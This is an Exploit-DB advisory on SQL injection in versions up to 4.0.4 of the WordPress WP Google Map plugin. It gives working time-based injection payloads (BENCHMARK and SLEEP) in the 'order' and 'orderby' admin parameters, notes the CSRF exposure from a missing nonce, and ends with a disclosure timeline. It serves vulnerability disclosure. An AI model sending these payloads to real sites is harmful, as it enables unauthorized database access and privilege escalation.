WordPress Google Map Plugin < 4.0.4 - SQL Injection

2018-06-12T00:00:00
ID EDB-ID:44883
Type exploitdb
Reporter Exploit-DB
Modified 2018-06-12T00:00:00

Description

WordPress Google Map Plugin < 4.0.4 - SQL Injection. Webapps exploit for PHP platform

                                        
                                            # Title: WordPress Google Map Plugin &lt; 4.0.4 - SQL Injection
# Author: defensecode
# Date: 2018-06-12
# Software: WordPress WP Google Map plugin
# Version: 4.0.4 and below
# Vendor Status:  Vendor contacted, no response

# Vulnerability Description
# The easiest way to reproduce the vulnerabilities is to visit the
# provided URL while being logged in as administrator or another user
# that is authorized to access the plugin settings page. Users that do
# not have full administrative privileges could abuse the database
# access the vulnerabilities provide to either escalate their privileges
# or obtain and modify database contents they were not supposed to be
# able to.

# Due to the missing nonce token, the vulnerable code is also directly
# exposed to attack vectors such as Cross Site request forgery (CSRF).

# SQL injection
# Vulnerable Function:  $wpdb-&gt;get_results()
# Vulnerable Variable:  $_GET['order']
# Vulnerable URL:

http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc
PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)


# SQL injection
# Vulnerable Function:  $wpdb-&gt;get_results()
# Vulnerable Variable:  $_GET['orderby']
# Vulnerable URL:

http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc

# Disclosure Timeline
# 2018/05/11   Vulnerabilities discovered
# 2018/05/16   Vendor contacted
# 2018/06/08   No response
# 2018/06/12   Advisory released to the public